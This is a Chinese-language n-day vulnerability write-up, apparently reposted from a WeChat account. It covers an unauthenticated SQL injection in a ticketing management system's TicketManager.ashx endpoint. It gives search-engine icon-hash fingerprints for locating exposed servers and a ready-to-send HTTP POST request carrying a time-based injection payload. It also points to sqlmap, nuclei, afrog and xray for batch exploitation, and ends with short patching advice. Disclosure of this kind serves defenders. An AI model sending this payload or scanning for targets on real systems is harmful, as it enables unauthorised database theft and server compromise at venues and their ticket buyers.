中成科信票务管理系统 TicketManager.ashx SQL注入漏洞 PoC

0x01 产品简介

中成科信票务管理系统是专注于演出剧院、体育场馆、旅游景区、游乐园、场地活动的票务管理系统,并为特殊客户量身定制票务应用解决方案，可根据用户的要求采用不同的技术载体实现门票的防伪：二维条码门票防伪技术、RFID电子门票防伪技术、手机二维码门票技术、变温微缩文字荧光等防伪票纸技术。根据票务系统应用环境的不同,系统的检票环节可定制为全自动闸机检票、手持终端机检票、无色荧光检测器等检票方式,也可多种方式并存。

0x02 漏洞概述

某成科信票务管理系统 TicketManager.ashx 接口处存在SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息（例如管理员后台密码、站点用户个人信息）之外，攻击者甚至可以在高权限下向服务器写入命令，进一步获取服务器系统权限。

0x03 搜索引擎

icon_hash="1632964065" || icon_hash="-2142050529"

0x04 漏洞复现

POST /SystemManager/Api/TicketManager.ashx HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0Content-Type: application/x-www-form-urlencodedConnection: closeMethod=GetReServeOrder&solutionId=1' WAITFOR DELAY '0:0:5'--

‍

sqlmap验证

0x05 工具批量

nuclei

afrog

xray

0x06 修复建议

1、关闭互联网暴露面或接口设置访问权限

2、⼚商已发布了漏洞修复程序，请及时关注更新：

http://zckx.yyalf.com/

原文始发于微信公众号（nday POC）：【漏洞复现】某成科信票务管理系统 TicketManager.ashx SQL注入漏洞